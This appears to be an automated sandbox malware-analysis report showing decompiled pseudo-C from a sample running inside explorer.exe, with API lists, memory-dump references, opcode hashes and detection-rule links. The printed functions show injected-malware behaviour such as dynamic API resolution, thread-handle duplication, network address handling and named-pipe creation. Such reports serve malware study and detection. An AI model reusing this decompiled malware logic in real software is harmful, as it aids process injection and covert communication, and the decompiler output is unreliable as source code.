                                                                                                                                                                                                0x10012cd2
                                                                                                                                                                                                0x10012cbc
                                                                                                                                                                                                0x10012cc4
                                                                                                                                                                                                0x10012cc4
                                                                                                                                                                                                0x10012cd5
                                                                                                                                                                                                0x10012cd9
                                                                                                                                                                                                0x10012ce9
                                                                                                                                                                                                0x10012d0c
                                                                                                                                                                                                0x10012d1e
                                                                                                                                                                                                0x10012ceb
                                                                                                                                                                                                0x10012cff
                                                                                                                                                                                                0x10012cff
                                                                                                                                                                                                0x10012d28
                                                                                                                                                                                                0x10012d44
                                                                                                                                                                                                0x10012d2a
                                                                                                                                                                                                0x10012d39
                                                                                                                                                                                                0x10012d39
                                                                                                                                                                                                0x10012d4c
                                                                                                                                                                                                0x10012d55
                                                                                                                                                                                                0x10012d55
                                                                                                                                                                                                0x10012d63
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10012cac
                                                                                                                                                                                                0x10012cae
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10012cae
                                                                                                                                                                                                0x10012caa
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10012c6d
                                                                                                                                                                                                0x10012b50
                                                                                                                                                                                                0x10012b5e
                                                                                                                                                                                                0x10012b63
                                                                                                                                                                                                0x10012b6e
                                                                                                                                                                                                0x10012b71
                                                                                                                                                                                                0x10012b75
                                                                                                                                                                                                0x10012b77
                                                                                                                                                                                                0x10012b87
                                                                                                                                                                                                0x10012b90
                                                                                                                                                                                                0x10012b99
                                                                                                                                                                                                0x10012ba1
                                                                                                                                                                                                0x10012baa
                                                                                                                                                                                                0x10012bb5
                                                                                                                                                                                                0x10012bbb
                                                                                                                                                                                                0x10012bbe
                                                                                                                                                                                                0x10012bc1
                                                                                                                                                                                                0x10012bc8
                                                                                                                                                                                                0x10012bcf
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10012bda
                                                                                                                                                                                                0x10012be8
                                                                                                                                                                                                0x10012bf3
                                                                                                                                                                                                0x10012bfd
                                                                                                                                                                                                0x10012c15
                                                                                                                                                                                                0x10012c22
                                                                                                                                                                                                0x10012c22
                                                                                                                                                                                                0x10012bff
                                                                                                                                                                                                0x10012c0a
                                                                                                                                                                                                0x10012c0a
                                                                                                                                                                                                0x10012c29
                                                                                                                                                                                                0x10012c29
                                                                                                                                                                                                0x10012c31
                                                                                                                                                                                                0x10012c31
                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(?), ref: 10012C84
                                                                                                                                                                                                • LoadLibraryA.KERNEL32(?), ref: 10012C9D
                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,890CC483), ref: 10012CF9
                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 10012D18
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AddressProc$HandleLibraryLoadModule
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 384173800-0
                                                                                                                                                                                                • Opcode ID: 5436229f79adfd2309291a4696e3cc16a3b33e027d57b62ece0ec2bba77662a7
                                                                                                                                                                                                • Instruction ID: bbc7bc05dd77d852e6aa3dff5e404edcf5ca9dda2a904c96c6524fe084a399b0
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5436229f79adfd2309291a4696e3cc16a3b33e027d57b62ece0ec2bba77662a7
                                                                                                                                                                                                • Instruction Fuzzy Hash: 94A169B5A00219DFCB54CFA8D881AADBBF0FF08354F108569E915AB391D734EA91CF64
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 10001C51, Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 75%
                                                                                                                                                                                                			E10001C51(signed int __ecx, void* __eflags, void* __fp0) {
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				void* _t13;
				intOrPtr _t15;
				signed int _t16;
				intOrPtr _t17;
				signed int _t18;
				char _t20;
				intOrPtr _t22;
				void* _t23;
				void* _t24;
				intOrPtr _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t48;
				void* _t51;
				signed int _t61;
				signed int _t64;
				void* _t71;

				_t71 = __fp0;
				_t61 = __ecx;
				_t41 =  *0x1001e6dc; // 0x0
				_t13 = E1000A501(_t41, 0);
				while(_t13 < 0) {
					E100097ED( &_v28);
					_t43 =  *0x1001e6e0; // 0x0
					_t15 =  *0x1001e6e4; // 0x0
					_t41 = _t43 + 0xe10;
					asm("adc eax, ebx");
					__eflags = _t15 - _v24;
					if(__eflags > 0) {
						L9:
						_t16 = 0xfffffffe;
						L13:
						return _t16;
					}
					if(__eflags < 0) {
						L4:
						_t17 =  *0x1001e684; // 0x4d2f878
						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0x1001e6d0, 0);
						__eflags = _t18;
						if(_t18 == 0) {
							break;
						}
						_t35 =  *0x1001e684; // 0x4d2f878
						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
						_t41 =  *0x1001e6dc; // 0x0
						__eflags = 0;
						_t13 = E1000A501(_t41, 0);
						continue;
					}
					__eflags = _t41 - _v28;
					if(_t41 >= _v28) {
						goto L9;
					}
					goto L4;
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t20 =  *0x1001e6e8; // 0x0
				_v28 = _t20;
				_t22 = E1000A6EB(_t41, _t61,  &_v16);
				_v20 = _t22;
				if(_t22 != 0) {
					_t23 = GetCurrentProcess();
					_t24 = GetCurrentThread();
					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0x1001e6d0, 0, 0, 2);
					E100097ED(0x1001e6e0);
					_t64 = E10001A01( &_v28, E10001226, _t71);
					__eflags = _t64;
					if(_t64 >= 0) {
						_push(0);
						_push( *0x1001e760);
						_t51 = 0x27;
						E10009ED1(_t51);
					}
				} else {
					_t64 = _t61 | 0xffffffff;
				}
				_t29 =  *0x1001e684; // 0x4d2f878
				 *((intOrPtr*)(_t29 + 0x30))( *0x1001e6d0);
				_t48 =  *0x1001e6dc; // 0x0
				 *0x1001e6d0 = 0;
				E1000A51D(_t48);
				E100085FB( &_v24, 0);
				_t16 = _t64;
				goto L13;
			}

























                                                                                                                                                                                                0x10001c51
                                                                                                                                                                                                0x10001c5e
                                                                                                                                                                                                0x10001c60
                                                                                                                                                                                                0x10001c67
                                                                                                                                                                                                0x10001ccd
                                                                                                                                                                                                0x10001c74
                                                                                                                                                                                                0x10001c79
                                                                                                                                                                                                0x10001c7f
                                                                                                                                                                                                0x10001c84
                                                                                                                                                                                                0x10001c8a
                                                                                                                                                                                                0x10001c8c
                                                                                                                                                                                                0x10001c90
                                                                                                                                                                                                0x10001cfe
                                                                                                                                                                                                0x10001d00
                                                                                                                                                                                                0x10001d82
                                                                                                                                                                                                0x10001d88
                                                                                                                                                                                                0x10001d88
                                                                                                                                                                                                0x10001c92
                                                                                                                                                                                                0x10001c9a
                                                                                                                                                                                                0x10001c9a
                                                                                                                                                                                                0x10001ca6
                                                                                                                                                                                                0x10001cac
                                                                                                                                                                                                0x10001cae
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10001cb0
                                                                                                                                                                                                0x10001cba
                                                                                                                                                                                                0x10001cc0
                                                                                                                                                                                                0x10001cc6
                                                                                                                                                                                                0x10001cc8
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10001cc8
                                                                                                                                                                                                0x10001c94
                                                                                                                                                                                                0x10001c98
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10001c98
                                                                                                                                                                                                0x10001cd7
                                                                                                                                                                                                0x10001cd8
                                                                                                                                                                                                0x10001cd9
                                                                                                                                                                                                0x10001cda
                                                                                                                                                                                                0x10001cdb
                                                                                                                                                                                                0x10001ce0
                                                                                                                                                                                                0x10001cea
                                                                                                                                                                                                0x10001cef
                                                                                                                                                                                                0x10001cf7
                                                                                                                                                                                                0x10001d12
                                                                                                                                                                                                0x10001d15
                                                                                                                                                                                                0x10001d1f
                                                                                                                                                                                                0x10001d2a
                                                                                                                                                                                                0x10001d3d
                                                                                                                                                                                                0x10001d3f
                                                                                                                                                                                                0x10001d41
                                                                                                                                                                                                0x10001d43
                                                                                                                                                                                                0x10001d44
                                                                                                                                                                                                0x10001d4c
                                                                                                                                                                                                0x10001d4d
                                                                                                                                                                                                0x10001d53
                                                                                                                                                                                                0x10001cf9
                                                                                                                                                                                                0x10001cf9
                                                                                                                                                                                                0x10001cf9
                                                                                                                                                                                                0x10001d54
                                                                                                                                                                                                0x10001d5f
                                                                                                                                                                                                0x10001d62
                                                                                                                                                                                                0x10001d68
                                                                                                                                                                                                0x10001d6e
                                                                                                                                                                                                0x10001d79
                                                                                                                                                                                                0x10001d80
                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 0cb1578c0a39cae6aca948419ee61835f89ce0b6080761fa6d5caf452c66e295
                                                                                                                                                                                                • Instruction ID: 989caab118ce7ab378d4ccd16ca8a60e31d7662a7ac1e85353e2c3f970fe6dd1
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0cb1578c0a39cae6aca948419ee61835f89ce0b6080761fa6d5caf452c66e295
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A31C336604294AFF344DFA4DCC5C6E77A9FB583D4B80462AF941C71A5DA30ED048B52
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 10001B16, Relevance: 6.1, APIs: 4, Instructions: 97threadCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 73%
                                                                                                                                                                                                			E10001B16(void* __eflags, void* __fp0) {
				char _v24;
				char _v28;
				void* _t12;
				intOrPtr _t14;
				void* _t15;
				intOrPtr _t16;
				void* _t17;
				void* _t19;
				void* _t20;
				char _t24;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr _t33;
				intOrPtr _t38;
				intOrPtr _t40;
				void* _t41;
				intOrPtr _t46;
				void* _t48;
				intOrPtr _t51;
				void* _t61;
				void* _t71;

				_t71 = __fp0;
				_t38 =  *0x1001e6f4; // 0x0
				_t12 = E1000A501(_t38, 0);
				while(_t12 < 0) {
					E100097ED( &_v28);
					_t40 =  *0x1001e700; // 0x0
					_t14 =  *0x1001e704; // 0x0
					_t41 = _t40 + 0x3840;
					asm("adc eax, ebx");
					__eflags = _t14 - _v24;
					if(__eflags > 0) {
						L13:
						_t15 = 0;
					} else {
						if(__eflags < 0) {
							L4:
							_t16 =  *0x1001e684; // 0x4d2f878
							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0x1001e6ec, 0);
							__eflags = _t17;
							if(_t17 == 0) {
								break;
							} else {
								_t33 =  *0x1001e684; // 0x4d2f878
								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
								_t51 =  *0x1001e6f4; // 0x0
								__eflags = 0;
								_t12 = E1000A501(_t51, 0);
								continue;
							}
						} else {
							__eflags = _t41 - _v28;
							if(_t41 >= _v28) {
								goto L13;
							} else {
								goto L4;
							}
						}
					}
					L12:
					return _t15;
				}
				E100097ED(0x1001e700);
				_t19 = GetCurrentProcess();
				_t20 = GetCurrentThread();
				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0x1001e6ec, 0, 0, 2);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t24 =  *0x1001e6e8; // 0x0
				_v28 = _t24;
				_t61 = E10001A01( &_v28, E10001310, _t71);
				if(_t61 >= 0) {
					_push(0);
					_push( *0x1001e760);
					_t48 = 0x27;
					E10009ED1(_t48);
				}
				if(_v24 != 0) {
					E10006871( &_v24);
				}
				_t26 =  *0x1001e684; // 0x4d2f878
				 *((intOrPtr*)(_t26 + 0x30))( *0x1001e6ec);
				_t28 =  *0x1001e758; // 0x0
				 *0x1001e6ec = 0;
				_t29 =  !=  ? 1 : _t28;
				_t46 =  *0x1001e6f4; // 0x0
				 *0x1001e758 =  !=  ? 1 : _t28;
				E1000A51D(_t46);
				_t15 = _t61;
				goto L12;
			}
























                                                                                                                                                                                                0x10001b16
                                                                                                                                                                                                0x10001b1c
                                                                                                                                                                                                0x10001b2a
                                                                                                                                                                                                0x10001b98
                                                                                                                                                                                                0x10001b37
                                                                                                                                                                                                0x10001b3c
                                                                                                                                                                                                0x10001b42
                                                                                                                                                                                                0x10001b47
                                                                                                                                                                                                0x10001b4d
                                                                                                                                                                                                0x10001b4f
                                                                                                                                                                                                0x10001b53
                                                                                                                                                                                                0x10001c4d
                                                                                                                                                                                                0x10001c4d
                                                                                                                                                                                                0x10001b59
                                                                                                                                                                                                0x10001b59
                                                                                                                                                                                                0x10001b65
                                                                                                                                                                                                0x10001b65
                                                                                                                                                                                                0x10001b71
                                                                                                                                                                                                0x10001b77
                                                                                                                                                                                                0x10001b79
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10001b7b
                                                                                                                                                                                                0x10001b7b
                                                                                                                                                                                                0x10001b85
                                                                                                                                                                                                0x10001b8b
                                                                                                                                                                                                0x10001b91
                                                                                                                                                                                                0x10001b93
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10001b93
                                                                                                                                                                                                0x10001b5b
                                                                                                                                                                                                0x10001b5b
                                                                                                                                                                                                0x10001b5f
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10001b5f
                                                                                                                                                                                                0x10001b59
                                                                                                                                                                                                0x10001c46
                                                                                                                                                                                                0x10001c4c
                                                                                                                                                                                                0x10001c4c
                                                                                                                                                                                                0x10001ba1
                                                                                                                                                                                                0x10001bb5
                                                                                                                                                                                                0x10001bb8
                                                                                                                                                                                                0x10001bc2
                                                                                                                                                                                                0x10001bce
                                                                                                                                                                                                0x10001bd8
                                                                                                                                                                                                0x10001bd9
                                                                                                                                                                                                0x10001bda
                                                                                                                                                                                                0x10001bdb
                                                                                                                                                                                                0x10001be0
                                                                                                                                                                                                0x10001be9
                                                                                                                                                                                                0x10001bed
                                                                                                                                                                                                0x10001bef
                                                                                                                                                                                                0x10001bf0
                                                                                                                                                                                                0x10001bf8
                                                                                                                                                                                                0x10001bf9
                                                                                                                                                                                                0x10001bff
                                                                                                                                                                                                0x10001c04
                                                                                                                                                                                                0x10001c0a
                                                                                                                                                                                                0x10001c0a
                                                                                                                                                                                                0x10001c0f
                                                                                                                                                                                                0x10001c1a
                                                                                                                                                                                                0x10001c1d
                                                                                                                                                                                                0x10001c25
                                                                                                                                                                                                0x10001c31
                                                                                                                                                                                                0x10001c34
                                                                                                                                                                                                0x10001c3a
                                                                                                                                                                                                0x10001c3f
                                                                                                                                                                                                0x10001c44
                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(1001E6EC,00000000,00000000,00000002), ref: 10001BB5
                                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 10001BB8
                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000), ref: 10001BBF
                                                                                                                                                                                                • DuplicateHandle.KERNEL32(00000000), ref: 10001BC2
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Current$Process$DuplicateHandleThread
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3566409357-0
                                                                                                                                                                                                • Opcode ID: 62bd059770830b72633f7d4dc17b942c06e00c57d486a44e07410d3c772891c6
                                                                                                                                                                                                • Instruction ID: 409c5083fe20d1cac3a8bc114e50d19fd07b1f0f1d95d7a48f174e7666a0a82d
                                                                                                                                                                                                • Opcode Fuzzy Hash: 62bd059770830b72633f7d4dc17b942c06e00c57d486a44e07410d3c772891c6
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3931AD356082A09FF308DF64CCD8D6E77A8FB683D1B418928F602872A5DB30EC44CB52
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 10001A01, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108stringCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 72%
                                                                                                                                                                                                			E10001A01(intOrPtr __ecx, intOrPtr __edx, void* __fp0) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				CHAR* _v20;
				char _v36;
				signed short _t23;
				CHAR* _t24;
				CHAR* _t25;
				CHAR* _t33;
				char _t38;
				intOrPtr _t39;
				intOrPtr _t49;
				intOrPtr _t52;
				intOrPtr* _t55;
				void* _t57;
				signed int _t59;
				signed int _t60;
				signed int _t63;
				CHAR* _t65;
				void* _t75;

				_t75 = __fp0;
				_t39 = __ecx;
				_v16 = __edx;
				_t38 = 0;
				_t55 =  *0x1001e6f0; // 0x0
				_push(_t59);
				_t60 = _t59 | 0xffffffff;
				_v12 = __ecx;
				_t65 = _t60;
				if( *_t55 != 0) {
					L6:
					_t23 =  *0x1001e6fc; // 0x0
					_t73 = _t23;
					if(_t23 == 0) {
						goto L9;
					} else {
						_t25 = E100015F3(_v16, _t55, _t73, _t23 & 0x0000ffff, _t39);
						_t65 = _t25;
						if(_t65 < 0) {
							goto L9;
						} else {
						}
					}
				} else {
					_t49 =  *0x1001e778; // 0x0
					_push(0);
					_push(0);
					_t57 = 0x2d;
					_v8 = E10009F60(_t49, _t57);
					_t33 = E10009E47(0x2e);
					_t58 = _v8;
					_v20 = _t33;
					if(_v8 != 0 && _t33 != _t60) {
						_t52 =  *0x1001e6f0; // 0x0
						E100096AB(_t52, _t58, 0x100);
						 *0x1001e6fc = _v20;
					}
					E100085FB( &_v8, _t60);
					_t55 =  *0x1001e6f0; // 0x0
					if( *_t55 == _t38) {
						L9:
						_v8 = _t38;
						_t24 = E1000175E( &_v8, _t75);
						_v20 = _t24;
						__eflags = _t24;
						if(_t24 != 0) {
							__eflags = _v8 - _t38;
							if(_v8 > _t38) {
								_t14 =  &(_t24[4]); // 0x4
								_t63 = _t14;
								while(1) {
									__eflags =  *_t63;
									if(__eflags != 0) {
										__imp__#12(0x10);
										lstrcpynA( &_v36, _t24,  *_t63);
										_t24 = E100015F3(_v16,  &_v36, __eflags,  *(_t63 + 4) & 0x0000ffff, _v12);
										_t65 = _t24;
									}
									__eflags = _t65;
									if(_t65 >= 0) {
										break;
									}
									_t38 = _t38 + 1;
									_t63 = _t63 + 0x20;
									__eflags = _t38 - _v8;
									if(_t38 < _v8) {
										continue;
									}
									break;
								}
								_t60 = _t63 | 0xffffffff;
								__eflags = _t60;
							}
							E100085FB( &_v20, _v8);
						}
						__eflags = _t65;
						_t61 =  >=  ? _t65 : _t60;
						_t25 =  >=  ? _t65 : _t60;
					} else {
						_t39 = _v12;
						goto L6;
					}
				}
				return _t25;
			}























                                                                                                                                                                                                0x10001a01
                                                                                                                                                                                                0x10001a01
                                                                                                                                                                                                0x10001a08
                                                                                                                                                                                                0x10001a0b
                                                                                                                                                                                                0x10001a0d
                                                                                                                                                                                                0x10001a14
                                                                                                                                                                                                0x10001a15
                                                                                                                                                                                                0x10001a18
                                                                                                                                                                                                0x10001a1b
                                                                                                                                                                                                0x10001a1f
                                                                                                                                                                                                0x10001a7f
                                                                                                                                                                                                0x10001a7f
                                                                                                                                                                                                0x10001a85
                                                                                                                                                                                                0x10001a88
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10001a8a
                                                                                                                                                                                                0x10001a92
                                                                                                                                                                                                0x10001a97
                                                                                                                                                                                                0x10001a9d
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10001a9f
                                                                                                                                                                                                0x10001a9d
                                                                                                                                                                                                0x10001a21
                                                                                                                                                                                                0x10001a21
                                                                                                                                                                                                0x10001a27
                                                                                                                                                                                                0x10001a28
                                                                                                                                                                                                0x10001a2b
                                                                                                                                                                                                0x10001a33
                                                                                                                                                                                                0x10001a36
                                                                                                                                                                                                0x10001a3b
                                                                                                                                                                                                0x10001a41
                                                                                                                                                                                                0x10001a46
                                                                                                                                                                                                0x10001a4c
                                                                                                                                                                                                0x10001a57
                                                                                                                                                                                                0x10001a60
                                                                                                                                                                                                0x10001a60
                                                                                                                                                                                                0x10001a6b
                                                                                                                                                                                                0x10001a70
                                                                                                                                                                                                0x10001a7a
                                                                                                                                                                                                0x10001aa1
                                                                                                                                                                                                0x10001aa4
                                                                                                                                                                                                0x10001aa7
                                                                                                                                                                                                0x10001aac
                                                                                                                                                                                                0x10001aaf
                                                                                                                                                                                                0x10001ab1
                                                                                                                                                                                                0x10001ab3
                                                                                                                                                                                                0x10001ab6
                                                                                                                                                                                                0x10001ab8
                                                                                                                                                                                                0x10001ab8
                                                                                                                                                                                                0x10001abb
                                                                                                                                                                                                0x10001abb
                                                                                                                                                                                                0x10001abe
                                                                                                                                                                                                0x10001ac4
                                                                                                                                                                                                0x10001acf
                                                                                                                                                                                                0x10001ae3
                                                                                                                                                                                                0x10001aea
                                                                                                                                                                                                0x10001aea
                                                                                                                                                                                                0x10001aec
                                                                                                                                                                                                0x10001aee
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10001af0
                                                                                                                                                                                                0x10001af1
                                                                                                                                                                                                0x10001af4
                                                                                                                                                                                                0x10001af7
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10001af7
                                                                                                                                                                                                0x10001af9
                                                                                                                                                                                                0x10001af9
                                                                                                                                                                                                0x10001af9
                                                                                                                                                                                                0x10001b03
                                                                                                                                                                                                0x10001b09
                                                                                                                                                                                                0x10001b0a
                                                                                                                                                                                                0x10001b0c
                                                                                                                                                                                                0x10001b0f
                                                                                                                                                                                                0x10001a7c
                                                                                                                                                                                                0x10001a7c
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10001a7c
                                                                                                                                                                                                0x10001a7a
                                                                                                                                                                                                0x10001b15

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • inet_ntoa.WS2_32(00000004), ref: 10001AC4
                                                                                                                                                                                                • lstrcpynA.KERNEL32(?,00000000), ref: 10001ACF
                                                                                                                                                                                                  • Part of subcall function 100096AB: memset.MSVCRT ref: 100096D4
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: inet_ntoalstrcpynmemset
                                                                                                                                                                                                • String ID: @}3u
                                                                                                                                                                                                • API String ID: 129148211-847092897
                                                                                                                                                                                                • Opcode ID: 2ff538a7969370964a1824f7d2e75486253296b6791e3705cbd6b1be8b8011ed
                                                                                                                                                                                                • Instruction ID: 38053383c4236d1d8a5a71da8a126f05441a8ed644907563ab899a3ef3cb99fb
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2ff538a7969370964a1824f7d2e75486253296b6791e3705cbd6b1be8b8011ed
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9331E736E05266EBFB01CBA4DC809DD77B9FF443A0F10416AE510A7288DB31EE41CB91
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Analysis Process: explorer.exe PID: 6888 Parent PID: 6932 explorer.exeCOMMON

                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                Function 00AF31B5, Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 79%
                                                                                                                                                                                                			E00AF31B5(void* __edx, void* __eflags) {
				CHAR* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v20;
				signed int _t10;
				intOrPtr _t11;
				intOrPtr _t12;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t22;
				intOrPtr _t28;
				void* _t38;
				CHAR* _t40;

				_t38 = __edx;
				_t28 =  *0xb0e688; // 0xb20000
				_t10 = E00AFC2D4( *((intOrPtr*)(_t28 + 0xac)), __eflags);
				_t40 = _t10;
				_v8 = _t40;
				if(_t40 != 0) {
					_t11 = E00AF85E5(0x80000); // executed
					 *0xb0e724 = _t11;
					__eflags = _t11;
					if(_t11 != 0) {
						_t12 = E00AFBD52(); // executed
						_v16 = _t12;
						__eflags = _t12;
						if(_t12 != 0) {
							_push(0xc);
							_pop(0);
							_v12 = 1;
						}
						_v20 = 0;
						__eflags = 0;
						asm("sbb eax, eax");
						_t16 = CreateNamedPipeA(_t40, 0x80003, 6, 0xff, 0x80000, 0x80000, 0, 0 &  &_v20);
						 *0xb0e674 = _t16;
						__eflags = _t16 - 0xffffffff;
						if(_t16 != 0xffffffff) {
							E00AFBCBC( &_v20, _t38); // executed
							_t18 = E00AF98CF(E00AF3294, 0, __eflags, 0, 0); // executed
							__eflags = _t18;
							if(_t18 != 0) {
								goto L12;
							}
							_t22 =  *0xb0e684; // 0x4d3f6c8
							 *((intOrPtr*)(_t22 + 0x30))( *0xb0e674);
							_push(0xfffffffd);
							goto L11;
						} else {
							 *0xb0e674 = 0;
							_push(0xfffffffe);
							L11:
							_pop(0);
							L12:
							E00AF85FB( &_v8, 0xffffffff);
							return 0;
						}
					}
					_push(0xfffffff5);
					goto L11;
				}
				return _t10 | 0xffffffff;
			}
















                                                                                                                                                                                                0x00af31b5
                                                                                                                                                                                                0x00af31bb
                                                                                                                                                                                                0x00af31cb
                                                                                                                                                                                                0x00af31d0
                                                                                                                                                                                                0x00af31d2
                                                                                                                                                                                                0x00af31d7
                                                                                                                                                                                                0x00af31e8
                                                                                                                                                                                                0x00af31ed
                                                                                                                                                                                                0x00af31f3
                                                                                                                                                                                                0x00af31f5
                                                                                                                                                                                                0x00af31fe
                                                                                                                                                                                                0x00af3203
                                                                                                                                                                                                0x00af3206
                                                                                                                                                                                                0x00af3208
                                                                                                                                                                                                0x00af320a
                                                                                                                                                                                                0x00af320c
                                                                                                                                                                                                0x00af320d
                                                                                                                                                                                                0x00af320d
                                                                                                                                                                                                0x00af321a
                                                                                                                                                                                                0x00af321d
                                                                                                                                                                                                0x00af3222
                                                                                                                                                                                                0x00af323c
                                                                                                                                                                                                0x00af3242
                                                                                                                                                                                                0x00af3247
                                                                                                                                                                                                0x00af324a
                                                                                                                                                                                                0x00af3256
                                                                                                                                                                                                0x00af3264
                                                                                                                                                                                                0x00af326b
                                                                                                                                                                                                0x00af326d
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af326f
                                                                                                                                                                                                0x00af327a
                                                                                                                                                                                                0x00af327d
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af324c
                                                                                                                                                                                                0x00af324c
                                                                                                                                                                                                0x00af3252
                                                                                                                                                                                                0x00af327f
                                                                                                                                                                                                0x00af327f
                                                                                                                                                                                                0x00af3280
                                                                                                                                                                                                0x00af3286
                                                                                                                                                                                                0x00000000
